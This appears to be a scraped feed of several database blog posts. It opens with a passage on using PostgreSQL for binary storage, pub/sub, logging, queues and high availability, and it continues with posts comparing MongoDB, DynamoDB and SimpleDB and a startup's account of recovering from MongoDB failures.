          6. http://dba.stackexchange.com/questions/130819/postgresql-9-5-brin-index-dramatically-slower-than-expected
          7. http://dev.sortable.com/brin-indexes-in-postgres-9.5/ 


          Object store for binary data. 

          “Never store images in your database!”
          I'm sure you've heard it many times before. But what if your images are your most important data? Surely they deserve something better than a filesystem? What if they need to be accessed from more than one web application server? The solution to this problem is often to store things in some cloud based storage like S3.

          BYTEA is the type to use for binary data in PostgreSQL if the size is less than 1GB.
          CREATE TABLE files (
              id serial primary key,
              filename text not null,
              data bytea not null
          )
          Note, however, that streaming the file is not really supported with BYTEA by all PostgreSQL drivers. It needs to be entirely in memory.

          However, many images are only 200KB or up to 10MB in size. Which should be fine even if you get hundreds of images added per day. A three year old laptop benchmark for you... Saving 2500 1MB iPhone sized images with python and psycopg2 takes about 1 minute and 45 seconds, just using a single core. (That's 2.5GB of data). It can be made 3x faster by using COPY IN/TO BINARY [1], however that is more than fast enough for many uses.

          If you need really large objects, then PostgreSQL has something called "Large Objects". But these aren't supported by some backup tools without extra configuration.

          Batteries included? Both the python SQL libraries (psycopg2, and sqlalchemy) have builtin support for BYTEA.

          But how do you easily copy files out of the database and into it? I made a image save and get gist here to save and get files with a 45 line python script. It's even easier when you use an ORM, since the data is just an attribute (open('bla.png').write(image.data)).

          A fairly important thing to consider with putting gigabytes of binary data into your PostgreSQL is that it will affect the backup/restore speed of your other data. This isn't such a problem if you have a hot spare replica, have point in time recovery(with WALL-e, pgbarman), use logical replication, or decide to restore selective tables.

          How about speed? I found it faster to put binary data into PostgreSQL compared to S3. Especially on low CPU clients (IoT), where you have to do full checksums of the data before sending it on the client side to S3. This also depends on the geographical location of S3 you are using, and your network connections to it.

          S3 also provides other advantages and features (like built in replication, and it's a managed service). But for storing a little bit of binary data, I think PostgreSQL is good enough. Of course if you want a highly durable globally distributed object store with very little setup then things like S3 are first.


          More reading.
          1. http://stackoverflow.com/questions/8144002/use-binary-copy-table-from-with-psycopg2/8150329#8150329

          Realtime, pubsub, change feeds, Reactive.

          Change feeds are a feed you can listen to for changes.  The pubsub (or Publish–subscribe pattern), can be done with LISTEN / NOTIFY and TRIGGER.

          Implement You've Got Mail functionality.
          This is quite interesting if you are implementing 'soft real time' features on your website or apps. If something happens to your data, then your application can 'immediately' know about it.  Websockets is the name of the web technology which makes this perform well, however HTTP2 also allows server push, and various other systems have been in use for a long time before both of these. Say you were making a chat messaging website, and you wanted to make a "You've got mail!" sound. Your Application can LISTEN to PostgreSQL, and when some data is changed a TRIGGER can send a NOTIFY event which PostgreSQL passes to your application, your application can then push the event to the web browser.

          PostgreSQL can not give you hard real time guarantees unfortunately. So custom high end video processing and storage systems, or specialized custom high speed financial products are not domains PostgreSQL is suited.

          How well does it perform? In the Queue section, I mentioned thousands of events per core on an old laptop.

          Issues for latency are the query planner and optimizer, and VACUUM, and ANALYZE.

          The query planner is sort of amazing, but also sort of annoying. It can automatically try and figure out the best way to query data for you. However, it doesn't automatically create an index where it might think one would be good. Depending on environmental factors, like how much CPU, IO, data in various tables and other statistics it gathers, it can change the way it searches for data. This is LOTS better than having to write your queries by hand, and then updating them every time the schema, host, or amount of data changes.

          But sometimes it gets things wrong, and that isn't acceptable when you have performance requirements. William Stein (from the Sage Math project) wrote about some queries mysteriously some times being slow at [7]. This was after porting his web app to use PostgreSQL instead of rethinkdb (TLDR; the port was possible and the result faster). The solution is usually to monitor those slow queries, and try to force the query planner to follow a path that you know is fast. Or to add/remove or tweak the index the query may or may not be using. Brady Holt wrote a good article on "Performance Tuning Queries in PostgreSQL".

          Later on I cover the topic of column databases, and 'real time' queries over that type of data popular in financial and analytic products (pg doesn't have anything built in yet, but extensions exist).

          VACUUM ANALYZE is a process that cleans things up with your data. It's a garbage collector (VACUUM) combined with a statistician (ANALYZE). It seems every release of PostgreSQL improves the performance for various corner cases. It used to have to be run manually, and now automatic VACUUM is a thing. Many more things can be done concurrently, and it can avoid having to read all the data in many more situations. However, sometimes, like with all garbage collectors it makes pauses. On the plus side, it can make your data smaller and inform itself about how to make faster queries. If you need to, you can turn off the autovacuum, and do things more manually. Also, you can just do the ANALYZE part to gather statistics, which can run much faster than VACUUM.

          To get better latency with python and PostgreSQL, there is asyncpg by magicstack. Which uses an asynchronous network model (python 3.5+), and the binary PostgreSQL protocol. This can have 2ms query times and is often faster than even golang, and nodejs. It also lets you read in a million rows per second from PostgreSQL to python per core [8]. Memory allocations are reduced, as is context switching - both things that cause latency.

          For these reasons, I think it's "good enough" for many soft real time uses, where the occasional time budget failure isn't the end of the world. If you load test your queries on real data (and for more data than you have), then you can be fairly sure it will work ok most of the time. Selecting the appropriate client side driver can also give you significant latency improvements.



          More reading.
          1. http://blog.sagemath.com/2017/02/09/rethinkdb-vs-postgres.html
          2. https://almightycouch.org/blog/realtime-changefeeds-postgresql-notify/
          3. https://blog.andyet.com/2015/04/06/postgres-pubsub-with-json/
          4. https://github.com/klaemo/postgres-triggers
          5. https://www.confluent.io/blog/bottled-water-real-time-integration-of-postgresql-and-kafka/
          6. https://www.geekytidbits.com/performance-tuning-postgres/
          7. http://blog.sagemath.com/2017/02/09/rethinkdb-vs-postgres.html 
          8. https://magic.io/blog/asyncpg-1m-rows-from-postgres-to-python/


          Log storage and processing

          Being able to have your logs in a central place for queries, and statistics is quite helpful. But so is grepping through logs. Doing relational or even full text queries on them is even better.

          rsyslog allows you to easily send your logs to a PostgeSQL database [1]. You set it up so that it stores the logs in files, but sends them to your database as well. This means if the database goes down for a while, the logs are still there. The rsyslog documentation has a section on high speed logging by using buffering on the rsyslog side [4].

          systemd is the more modern logging system, and it allows logging to remote locations with systemd-journal-remote. It sends JSON lines over HTTPS. You can take the data in with systemd (using it as a buffer) and then pipe it into PostgreSQL with COPY at high rates. The other option is to use the systemd support for sending logs to traditional syslogs like rsyslog, which can send it into a PostgreSQL.

          Often you want to grep your logs. SELECT regex matches can be used for grep/grok like functionality. It can also be used to parse your logs into a table format you can more easily query.

          TRIGGER can be used to parse the data every time a log entry is inserted. Or you can use MATERIALIZED VIEWs if you don't need to refresh the information as often.

          Is it fast enough? See this talk by Steven Simpson at the fosdem conference about infrastructure monitoring with PostgreSQL. In it he talks about using PostgreSQL to monitor and log a 100 node system. PostgreSQL on a single old laptop can quite happy ingest at a rate in the hundreds of thousands of messages per second range. Citusdata is an out of core solution which builds on PostgreSQL(and contributes to it ya!). It is being used to process billions of events, and is used by some of the largest companies on the internet (eg. Cloudflare with 5% of internet traffic uses it for logging). So PostgreSQL can scale up too(with out of core extensions).

          Batteries included? In the timeseries database section of this article, I mentioned that you can use grafana with PostgreSQL (with some effort). You can use this for dashboards, and alerting (amongst other things). However, I don't know of any really good systems (Sentry, Datadog, elkstack) which have first class PostgreSQL support out of the box.

          One advantage of having your logs in there is that you can write custom queries quite easily. Want to know how many requests per second from App server 1 there were, and link it up to your slow query log? That's just a normal SQL query, and you don't need to have someone grep through the logs... normal SQL tools can be used. When you combine this functionality with existing SQL analytics tools, this is quite nice.

          I think it's good enough for many small uses. If you've got more than 100 nodes, or are doing a lot of events, it might not be the best solution (unless you have quite a powerful PostgreSQL cluster). It does take a bit more work, and it's not the road most traveled. However it does let you use all the SQL analytics tools with one of the best metrics and alerting systems.


          More reading.
          1. http://www.rsyslog.com/doc/v8-stable/tutorials/database.html
          2. https://www.postgresql.org/docs/9.6/static/plpgsql-trigger.html
          3. https://www.postgresql.org/docs/9.6/static/functions-matching.html
          4. http://www.rsyslog.com/doc/v8-stable/tutorials/high_database_rate.html

          Queue for collecting data

          When you have traffic bursts, it's good to persist the data quickly, so that you can queue up processing for later. Perhaps you normally get only 100 visitors per day, but then some news article comes out or your website is mentioned on the radio (or maybe spammers strike) -- this is bursty traffic.

          Storing data, for processing later is things that systems like Kafka excel at.
           Using the COPY command, rather than lots of separate inserts can give you a very nice speedup for buffering data. If you do some processing on the data, or have constraints and indexes, all these things slow it down. So instead you can just put it in a normal table, and then process the data like you would with a queue.

          A lot of the notes for Log storage, and Queuing apply here. I guess you're starting to see a pattern? We've been able to use a few building blocks to implement efficient patterns that allow us to use PostgreSQL which might have required specialized databases in the past.

          The fastest way to get data into PostgreSQL from python? See this answer [1] where 'COPY {table} FROM STDIN WITH BINARY' is shown to be the fastest way.


          More reading.

          High availability, elasticity.

          “Will the database always be there for you? Will it grow with you?”
          To get things going quickly there are a number of places which offer PostgreSQL as a service [3][4][5][6][7][8]. So you can get them to setup replication, monitoring, scaling, backups, and software updates for you.

          The Recovery Point Objective (RPO), and Recovery Time Objective (RTO) are different for every project. Not all projects require extreme high availability. For some, it is fine to have the recovery happen hours or even a week later. Other projects can not be down for more than a few minutes or seconds at a time. I would argue that for many non-critical websites a hot standby and offsite backup will be 'good enough'.

          I would highly recommend this talk by Gunnar Bluth - "An overview of PostgreSQL's backup, archiving, and replication". However you might want to preprocess the sound with your favourite sound editor (eg. Audacity) to remove the feedback noise. The slides are there however with no ear destroying feedback sounds.

          By using a hot standby secondary replication you get the ability to quickly fail over from your main database. So you can be back up within minutes or seconds. By using pgbarman or wall-e, you get point in time recovery offsite backup of the database. To make managing the replicas easier, a tool like repmgr can come in handy.

          Having really extreme high availability with PostgreSQL is currently kind of hard, and requires out of core solutions. It should be easier in version 10.0 however.

          Patroni is an interesting system which helps you deploy a high availability cluster on AWS (with Spilo which is used in production), and work is in progress so that it works on Kubernetes clusters. Spilo is currently being used in production and can do various management tasks, like auto scaling, backups, node replacement on failure. It can work with a minimum of three nodes.

          As you can see there are multiple systems, and multiple vendors that help you scale PostgreSQL. On the low end, you can have backups of your database to S3 for cents per month, and a hotstandby replica for $5/month. You can also scale a single node all the way up to a machine with 24TB of storage, 32 cores and 244GB of memory. That's not in the same range as casandra installations with thousands of nodes, but it's still quite an impressive range.


          More reading.
          1. https://edwardsamuel.wordpress.com/2016/04/28/set-up-postgresql-9-5-master-slave-replication-using-repmgr/
          2. https://fosdem.org/2017/schedule/event/postgresql_backup/
          3. https://www.heroku.com/postgres
          4. http://crunchydata.com/
          5. https://2ndquadrant.com/en/
          6. https://www.citusdata.com/
          7. https://www.enterprisedb.com/
          8. https://aws.amazon.com/rds/postgresql/


          Column store, graph databases, other databases, ... finally The End?

          This article is already way too long... so I'll go quickly over these two topics.

          Graph databases like Neo4j allow you to do complex graph queries. Edges, nodes, and hierarchies. How to do that in PostgreSQL? Denormalise the data, and use a path like attribute and LIKE. So to find things in a graph, say all the children, you can pre-compute the path inside a string, rather than do complex recursive queries and joins using foreign keys.
          SELECT * FROM nodes WHERE path LIKE '/parenta/child2/child3%';
          Then you don't need super complex queries to get the graph structure from parent_id, child_ids and such. (Remember before how you can put a trigram index for fast LIKEs?) You can also use other pattern matching queries on this path, to do things like find all the parents up to 3 levels high that have a child.

          Tagging data with a fast LIKE becomes very easy as well. Just store the tags in a comma separated field and use an index on it.

          Column stores are where the data is stored in a column layout, instead of in rows. Often used for real time analytic work loads. One the oldest and best of these is Kdb+. Google made one, Druid is another popular one, and there are also plenty of custom ones used in graphics.

          But doesn't PostgreSQL store everything in row based format? Yes it does. However, there is an open source extension called cstore_fdw by Citus Data which is a column-oriented store for PostgreSQL.

          So how fast is it? There is a great series of articles by Mark Litwintschik, where he benchmarks a billion taxi ride data set with PostgreSQL and with kdb+ and various other systems. Without cstore_fdw, or parallel workers PostgreSQL took 3.5 hours to do a query. With 4 parallel workers, it was reduced to 1 hour and 1 minute. With cstore_fdw it took 2 minutes and 32 seconds. What a speed up!

          The End.

          I'm sorry that was so long. But it could have been way longer. It's not my fault...


          PostgreSQL carries around such a giant Tool Chest.


          Hopefully all these words may be helpful next time you want to use PostgreSQL for something outside of relational data. Also, I hope you can see that it can be possible to replace 10 database systems with just one, and that by doing so you can a gain significant ops advantage.

          Any corrections or suggestions? Please leave a comment, or see you on twitter @renedudfield
          There was discussion on hn and python reddit.

                    Comment on How important is it to use 2-byte and 3-byte integers? by Morgan Tocker        
          Some additional discussion here: https://github.com/github/gh-ost/issues/353 For some semi-proof of InnoDB buffer pool not being var-length in memory, you can see with pfs memory instrumentation in 5.7. The buffer pool is all one allocation just larger than innodb_buffer_pool_size.
                    Comment on MySQL soon to store system tables in InnoDB by Jameson        
          So soon?
                    7 Reasons You Should Use MongoDB over DynamoDB         
          Even recently I migrated from MongoDB to DynamoDB, and shared 3 reason to use DynamoDB. I still love MongoDB, really good NoSQL solution. Here are some points for you to make decision on using MongoDB over DynamoDB.

          Reason 1: Use MongoDB if your indexing fields might be altered later.
          With DynamoDB, it's NOT possible to alter indexing after being created. I have to admit that there are workarounds. For example, you can create a new table and import data from the old one. But no one is straightforward and you need some trade off if using workaround. Back to indexing, DynamoDB allows you define a hash key to make the data well-distributed, and then adding range key and secondary index. When query from table, hash key must be used, and then either range key or one of secondary indices. No complex query supported. The hash key, range key and secondary index key definition can NOT be changed in future. So your database structure must be well designed before going production. By the way, the secondary key will occupy additional storage. If you have 1G data, and if you create index and "project" all attribute to the index, then your actually cost of storage will be 2G data. If you project only the hash and range key value to index, then you need to query twice to get the whole record. Actually the API allows you to invoke query only once, but the cost to "read" capacity is twice. In addition, you can still "scan" the data and filter by conditions on un-indexed key, but please check the data in my previous post, scan could be 100 times (or more) slow than query.

          Reason 2: Use MongoDB if your need features of document database as your NoSQL solution.
          If you will save document like this:
          {
          _id: 1,
          name: { first: 'John', last: 'Backus' },
          birth: new Date('Dec 03, 1924'),
          death: new Date('Mar 17, 2007'),
          contribs: [ 'Fortran', 'ALGOL', 'Backus-Naur Form', 'FP' ],
          awards: [{
          award: 'National Medal of Science',
          year: 1975,
          by: 'National Science Foundation'
          }, {
          award: 'Turing Award',
          year: 1977,
          by: 'ACM'
          }]
          }
          (sample document from MongoDB technical document)
          With document database, you'll be able to query by name.first, or if some value exists in sub-document of awards. However, DynamoDB is key-value database, and support only value or set, no sub-document supported, and no complex index and query supported. It's not possible to save sub-document { first: 'John', last: 'Backus' } to name, accordingly, not possible to query by name.first.

          Reason 3: Use MongoDB if you are going to use Perl, Erlang, or C++.
          Official AWS SDK support Java, JavaScript, Ruby, PHP, Python, and .NET, while MongoDB supports more. I used node.js to build my backend server, both AWS SDK for node.js and mongoose SDK for MongoDB works very well. It's really amazing to use mongoose for MongoDB. It's in active development and the defect I report to mongoose can be fixed soon. I have also experience of using AWS SDK for Java and morphia for MongoDB, both of them works perfect! SDK for AWS and MongoDB are all well designed and widely used. But if your programing language is not listed in official support list, you may need to evaluate the quality of the SDK carefully. I have ever used non-official Java SDK for AWS SimpleDB, it's also good. But I can still easily get defect, for example, when using Boolean in object persistence modal, the Java SDK for SimpleDB cannot handle this type and will introduce some bad result.

          Reason 4: Use MongoDB if you may exceed the limits of DynamoDB.
          Please be careful about the limits and read them carefully if you are evaluating DynamoDB. You may easy to exceed some of the limits. For example, the value you stored in an item(value of a key) cannot exceed 64k bytes. It's easy to exceed 64k bytes when you allow user to input content. User may input a 100k bytes text as article title just because of pasting it by mistake. There is also workaround. I divide the content to multiple keys if it exceed the limits, and aggregate to one key in the post processing stage after reading the data from DynamoDB server. For example, the content of an article database may exceed 64k bytes, then in the pre-processing stage when storing to DynamoDB, I divide it to article.content0, article.content1, article.content2 and so on. After reading from DynamoDB, I will check if keys article.content0 exists, and if article.content0 exists, then continue to check article.content1, and combine the value in these fields to article.content and remove the article.content0, article.content1, and so on. This will introduce the complexity of your code and introduce additional dependency to your code. MongoDB does not have these limitations.

          Reason 5: Use MongoDB if you are going to have data type other than string, number, and base 64 encoded binary.
          In addition to string, number, binary, and array, MongoDB supports date, boolean, and a MongoDB specified type "Object ID". I use mongoose.js, and it supports these data type well. When you define data structure for object mapping, you can specify the correct type. Date and Boolean are quite important types. With DynamoDB you can use number as alternative, but still, need additional logic in your code to handle them. With MongoDB you can get all these data types by nature.

          Reason 6: Use MongoDB if you are going to query by regular expression.
          RegEx query might be an edge case, but in case this happens in your situation. DynamoDB provided a way to query by checking if a string or binary start with some substring, and provided the "CONTAINS" and "NOT_CONTAINS" filter when you do "scan". But you know "scan" is quite slow. With MongoDB, you can query easily on any key or sub document with RegEx, for example, if you want to query by user's name for "John" or "john", you can query by a simple regular expression {"name" => qr/[Jj]ohn/}, while this cannot be completed in DynamoDB by 1 query.

          Reason 7: Use MongoDB if you are a big funs of document database.
          10gen is the company backing MongoDB. They are very active on community. I asked question on stackoverflow, and Dylan, a Solution Architect of MongoDB, actively follows up my question, helped me analyze the issue, looked for the cause, also gave some very good suggestions on MongoDB. This is really a very good experience. In addition, the MongoDB community are willing to listen to users. Amazon is big company, it's not easy to getting touch with the people inside, not to mention impacting their decision and roadmap.

          Bonus Tips: Read carefully on DynamoDB document if you are going to use it.
          For example, there is an API "batchWriteItem". This API may return no error but give a field with key "UnprocessedItems" in result. This is somewhat anti-pattern. When I invoke a call, the result could be either success or failed. But this API gives a different status: "partial correct". You need to manually re-submit those "UnprocessedItems" again until there is no item in it. I didn't notice this because it's never happens during the testing. However, when there are big traffic, and the count of request to DynamoDB exceeded your quote for several seconds, this may happen.

          Hold on, before you made the decision on using MongoDB, please read 3 Reasons You Should Use DynamoDB over MongoDB.
                    3 Reasons You Should Use DynamoDB over MongoDB        
          Recently I post a blog to share my experience of migrating from MongoDB to DynamoDB. Migration is smooth, and here are a summary of 7 reason we did the migration:

          Reason 1: Use DynamoDB if you are NOT going to have an employee to manage the database servers. 
          This is the top 1 reason I migrate from MongoDB to DynamoDB. We are launching a startup, and we have a long list of user requirements from early adoption users. We want to make them satisfied. I need to develop the Windows/Mac OS/Ubuntu software and iPhone/Android apps, also need to work on server to provide data synchronization among these apps. Kelly is not a technically people and didn't have experience on managing servers. Someone may said that people can be a web developer with 21 days. However, that's really not easy for server troubleshooting. With only 15k users and 1.4 million records, I start to get into serious troubles. From the last post,  the more data I stored, the more worse the database latency. In future when I set sharding and replica set for shardings, I can imagine that database management may take a big portion of my time in future. With DynamoDB, you can totally avoid any database management stuff. AWS manages it very well. I've migrated the database for one week, everything works very well.

          Reason 2: Use DynamoDB if you didn't have budget for dedicated database servers.
          Because I didn't have too much traffic and data records. I used 2 linode VPS as database servers, 1G RAM, 24G disk. The 2 database server is grouped as replica set, and no sharding yet. Ideally they should support my current data scale very well. However it's not true. Upgrading database servers will take more cost, and may still not be able to resolve the issue. There are some managed MongoDB services, but I may not be able to stand for the cost. With current user base, the MongoDB database occupied 8G disk on data and 2G disk on journal file. With managed mongodb service, I need to select 25G plan and starting from US$500 monthly fee. If I got more traffic and users, it would cost too much. Before migration, I tested on DynamoDB, migrating all the data to DynamoDB, that is, 1.4 million records. The actually space is less than 300M. I'm not sure how managed mongodb service, I use command in mongo console to get the disk usage statistics. My first week of cost on DynamoDB is, US$0.05. That's the last week of July, let's see how much it will cost in August.

          Reason 3: Use DynamoDB if you are going to integrate with other Amazon Web Services.
          For example, full text index of the database. There are solutions for MongoDB, but you need to setup additional servers for indexing and search, and understand the system. The good thing is that MongoDB provided full text index, but I can imagine that full text index for multiple languages is not easy, especially the Chinese word segmentation. Amazon CloudSearch is a solution for DynamoDB full text index. Another example could be AWS Elastic MapReduce, it can be integrated with DynamoDB very easily. Also for database backup and restore, Amazon has other services to integrate with DynamoDB. In my opinion, as the major NoSQL database in Amazon Web Services, DynamoDB will have more and more features, and you can speed up development and reduce the cost of server management by integrating Amazon Web Services.

          However, DynamoDB has it's shortcomings. Before you made the decision on using DynamoDB, please read 7 Reasons You Should Use MongoDB over DynamoDB.
                    LEAN7: Migrate from MongoDB to AWS DynamoDB + SimpleDB        

          Migrate from MongoDB to DynamoDB + SimpleDB: New Server Side Architecture Ready for More Users

          Recently we have 14,000 registered users, a small portion of them are paid users. I feel that TeamViz is recognized for more and more sales (even still a very small number) generated every month. However, I start to get trouble on our server architecture mentioned in this post. The issue is, the MongoDB backed database getting locked for unknown reason for several minutes every 2 hours. Initially, the all request will be hold for 2 minutes every 2 hours 7 minutes. Now it becomes more worse, all request will be hold for 7 minutes every 2 hours and 7 minutes. I asked this question on stackoverflow, but no answer yet. So I can either increase the capacity of servers, or shift to another database server. We are small, and I can try different solutions.

          Because all the connection will be hold for several minutes, so the connection on load balancer looks like this way. (At the beginning I though the server are attacked, but no one will attack a sever every 2 hours 7 minutes, and for 1 month, right ^_^ )


          So here are several possible solutions. Use another NoSQL database, or use managed NoSQL database. My first decision is to looking for other NoSQL database servers, I have read comparison of NoSQL solutionsthis link about NoSQL benchmark, and this link about couchbase. Every NoSQL database has some pros and cons.

          I then talked with Kelly about the cost of server, cost of managed service, possibility of shifting to other NoSQL providers, or even shifting to MySQL. The conclusion is, current issue on MongoDB is just a start, we may take more time on managing databases and resolve performance, or some unknown issues. This will cost much energy. However, our focus is to providing better product. There are a lot of fun on playing NoSQL and other cutting edge technology. But that's not our goal. Shifting to managed database service can help us focusing on providing features/fix issues on product itself. At least we have a long list of features and issues to resolve. So we shifted to Amazon AWS DynamoDB, and to reduce the cost, part of the data on AWS SimpleDB. The server side is almost rewrote to handle the database change. I take this chance to practiced Promise pattern on node.js. It works great! and leveraged the middleware technology provided by Express framework. In addition, hold data of DynamoDB and SimpleDB in memcache. Everything has worked great for 24 hours (except that I got some error logs on memcache).

          Here are the picture after 10 hours of migration. The huge periodically traffic disappeared.

          Here are the new architecture on database and sync server.

          You may have concern about accessing AWS from Linode, currently it's fine. We have more than 1.3 million items in one DynamoDB table, and response from DynamoDB to get one record by key is 25 ~ 45 ms from Linode network. SimpleDB has less than 20k items, and also 25 ~ 45 ms.

          Some notes about the new architecture:
          - Why Linode: much cheaper than AWS EC2.
          - Why AWS DynamoDB and SimpleDB: don't want to worry about managing database.
          - memcached suppose to work independently, we use CouchBase because they provided automatic clustering.
          - Still, the design goal is to scale out. Every machine is independent. We can add more sync server and memcached server independently.
          - Future plan: currently we still need a message queue, AWS SQS does not provide a way for post event to multiple subscribers simultaneously. RabbitMQ can make it. But message queue is not urgent so far.
          - Future blog: I will share more experience on using SimpleDB and DynamoDB.
                    2 reasons why we select SimpleDB instead of DynamoDB        
          If you search on google with keywords "SimpleDB vs DynamoDB", there will be a lot of helpful posts. Most of them give you 3 to 7 reasons to select DynamoDB. However, today I'll share some experience of using SimpleDB instead of DynamoDB.

          I got some issues when use DynamoDB in my production, and finally found that SimpleDB is fit in my case perfectly. I think the choice of SimpleDB and DynamoDB should NOT rely on the performance or the benefits of the DynamoDB/SimpleDB, instead, based on the limitation and real requirement in my product.

          Some background: I have some data previously saved in MongoDB, the amount of data will mostly not exceed 2G bytes in SimpleDB. Now we decided not to maintain our MongoDB database servers, but leverage AWS SimpleDB or DynamoDB to reduce the cost on ops.

          Both SimpleDB/DynamoDB is key/value pair database. There are some workaround to store a JSON document, but will introduce additional cost. The data structure in my MongoDB is not too complicated and can be convert to key-value pair. So, before you choose SimpleDB or DynamoDB as your database backend, you must understand this fundamental.

          Reason 1: Not flexible on indexing. With DynamoDB you have to set indexing fields before creating the database, and cannot be modified. This is really limited the future change. DynamoDB supports 2 mode of data lookup, "Query" and "Scan". "Query": based on hash key and secondary keys, high performance. However, when you query data, “hash” key must be set. For example, suppose we have “id” key as hash key. When query by “id”, it’s good, we can get best performance. But when we query only by a field "name", we have to shift to “Scan” because hash key is not used. The performance of "Scan" is totally not acceptable because AWS will scan every record. I created a sample DynamoDb with 100,000 records, and each record has 6 fields. With "Scan", it costs 2 ~ 6 minutes to selecting ONE record by adding condition on one field. Here is the testing code in Java:

          DynamoDBScanExpression scan = new DynamoDBScanExpression();

          scan.addFilterCondition("count", new Condition().withAttributeValueList(new AttributeValue().withN("70569")).withComparisonOperator(ComparisonOperator.EQ));

          System.out.println("1=> " + new Date());

          PaginatedScanList<Book> list = mapper.scan(Book.class, scan);

          System.out.println("2=> " + new Date());

          Object[] all = list.toArray();

          System.out.println(all.length); // should be 1

          System.out.println("3=> " + new Date()); // 2 ~ 6 minutes comparing to date after “2=>”, in most cases around 2 minutes

          SimpleDB does not have this limitations. SimpleDB create index for "EVERY" field in a table(actually AWS use the term "domain", and MongoDB use "collection"). I modified a little bit the code and test on SimpleDB, here are the results:

          • Query 500 (use "limits" to get the first 500 items in a “select” call) items with no condition: about 400 ms to complete. The sample application running on my local machine. If it is running on EC2, it should be within 100 ms. 
          • Query 500 items with 1 condition, also about 400 ms to complete.
          Reason 2: Not cost effective for our case. The DynamoDB charge money by capacity of Read/Writes per seconds. Please note that the capacity is based on read/write your records instead of the read/write API call, and no matter you use batch or not. Here are more details in my test.  I used batch API to send 1000 records with more than 1000 bytes for each record. There will cost 50 seconds to finish the batch when the write capacity was set to 20/seconds. While I keep the my application running, and change the capacity on AWS console to 80/seconds, there will take 12 to 25 seconds to complete one batch(ideally it should be 1000/80 = 12.5 seconds, the extra time comes from network latency because I’m sending more than 1 megabytes data per API call). 

          In our case, we may read the 500 records in SimpleDB into memory, but read nothing in next 10 minutes. With SimpleDB we can complete it in 500 milliseconds. With DynamoDB we have to set read capacity to 1000 reads/seconds, and it will cost $94.46 per month(via AWS Simple Monthly Calculator). With SimpleDB, it may cost less than 1 dollar.

          Conclusion: DynamoDB is really designed for high performance database. SimpleDB has more flexibility. Here what I mean "really designed for high performance" to DynamoDB is, if you choose DynamoDB, you must make sure you have well designed your architecture for high traffic dynamic content. If you have design your architecture targeting high traffic dynamic content and high performance, DynamoDB may perfectly match your request. In our case, SimpleDB is enough, excellent flexibility, and cost effective. Before looking for the comparison of SimpleDB and DynamoDB, design your architecture first. DynamoDB is good, but not fit for everyone.

          Here are some useful links:

                    A Story of "Design for Failure"        

          When we come to the era of cloud computing, what's the most important factor you can imaging for the cloud computing? You may think of scaling. It could be, scaling is very important when your business getting bigger and bigger. You may think of backup, it always should be. You may also think of programable computing resources. That's a really important concept from AWS. Machine is programable, you can programmatically add or delete a  machine within seconds, instead of purchasing from vendor and deploy it to data center. You can allocate a new reliable database, without dependency on operations team. However, as a startup, my business is starting from scratch, and I do everything myself. In my practice, "Design for Failure" is really the top priority at the very beginning.

          As AWS providing EC2, and other vendors providing VPS, it would be a common sense to use VPS instead of building your own data center when you are not so big. Scaling is not so important because I'm still very small, limited machines are enough to support scale of current users. But I do designed for scaling in future. Design for failure? Yes, I have considered, but not so seriously. My VPS provider, Linode, claimed a 99.95% availability, and Linode has very good reputation in this industry. I trust them.

          Some background around my online service. I released a new version of desktop application PomodoroApp at the end of 2012, and support data synchronization across computers. User will rely on my server to sync data. It's yet another a new service on Internet, no one knows it. I'm not sure tomorrow it will be only 1 new users or 1,000 new users. Although I designed a reliable and scalable server architecture, I applied a minimum viable architecture for servers in order to reduce the cost. Perhaps nobody will use the service in next week. 2 web servers, one to host my website, and another to host a node.js server for data synchronization. It provide only rest services, I'll call it sync server. 1 MongoDB database server instance. Each one can be a single point of failure. It's acceptable if I have 99.95% availability. My sync server is in a very low load, so I configured the sync server to be the secondary of MongoDB replica set. The server code also support accessing data from replica set.



          Everything ran very well in the coming 2 months. I keep improving the server, adding new features. Users came to use my service from google, blog, Facebook, twitter, and increased with a stable speed. When I have new code, just need 1 seconds to restart service. February 17th, 2013, for an unknown reason, database server is out of service. Nobody knows the reason, Linode technical support managed to fix the issues. When database server was down, the secondary database on sync server became primary, and all data read/write switched to database on my sync server automatically, this may take 1 minute, depending on the timeout settings. So the outage of the database server has no impact to my sync service. 

          However, I'm just lucky for the incident of Feb 17. Just 3 days later, my sync server is down, and I even cannot restart the server from Linode managed console.  This took 55 minutes. I got alerts from monitor service pingdom, also from customers report. This is the first lesson. So the single point of failure does happen. I decided to add more sync servers. Consequently, a load balance server is necessary for 2 sync servers. In addition, I added the 3rd replica set which has 1 hour delay from primary server. In case there are any data broken, I can recover it from the backup server. You may ask why 1 hour delay instead of 24 hours. Ideally there should be multiple delayed replica set servers. In my production environment, user count is still small, and there is no necessary for sharding so far. But my new features, or my changes to existing code is only tested on dev environment. When I deployed it to server, it may make damage to server. I need a backup plan for this case. Even there are still SPOF, it 's much better:)

          The real disaster happened in May 11, I am going to deploy new version which resolved some issues on database. The new version handled index creation on database. I use a web based admin tool to manage my MongoDB instances. When I connect production database for final release testing, I happened to found a duplicated index on the collection. I'm not sure why this happen, so I deleted one on admin tool. The tool reported that 2 indexes are both deleted. Later when I continue my testing and try to sync data to server. I got the error that failed to commit to database. This never happens before. Then I use MongoDB console to check the collection. What made me surprising is, the whole collection is lost, neither to be created again. I shutdown the MongoDB server, and then try to restart it. Failed! The database log indicates "exception: BSONObj size: 0 (0x00000000) is invalid. Size must be between 0 and 16793600(16MB) First element: EOO". Googling the exception does not help much. Oh my, finally I have to recover the database. Fortunately I have a replica set which have realtime mirror for the database, and another replica set which has 1 hour delay for the database. I spent about 2 hours on fixing the issue, but my sync service is still online and functioned well. Because I have "stepDown" my primary and the secondary is now work as primary. Doing these troubleshooting does not hurt my online service. MongoDB really did an excellent job on the replica set pattern.

          Initially I decided to recover the database from the replica set which has 1 hour delay. But it's in another datacenter, I use scp to copy data file, only 1.7M bytes/seconds, I have 9G bytes data in total. That would spent a long time for copying. Then I checked the new primary database, fortunately found that the new primary(the old secondary) is in good shape, the data file does not broken. Then I stopped the primary database, and spent about 2 minutes to copy all the files with a 29M bytes file transfer speed within the same datacenter. Again, it's still a very small business. 2 minutes outage is acceptable, because my client software support offline mode, it has local database, and can work at the place without Internet. When the network is available, it will sync to server. Some users even disabled the sync feature because they don't what to upload any data to server. After all files are copied, I restart MongoDB. It took several seconds to recovery the uncommitted data from oplog, and try to duplicate from the primary server. Everything works well now. MongoDB rocks!

          Even I have the ultimate backup plan designed and tested on my client software, it still make me tense very much. Actually my  backup plan is, if the whole database is lost, I can still recover all the data. My client software supports offline mode, it duplicated all the data for the user. Automatic data recovery from user's machine to server has already been there. 

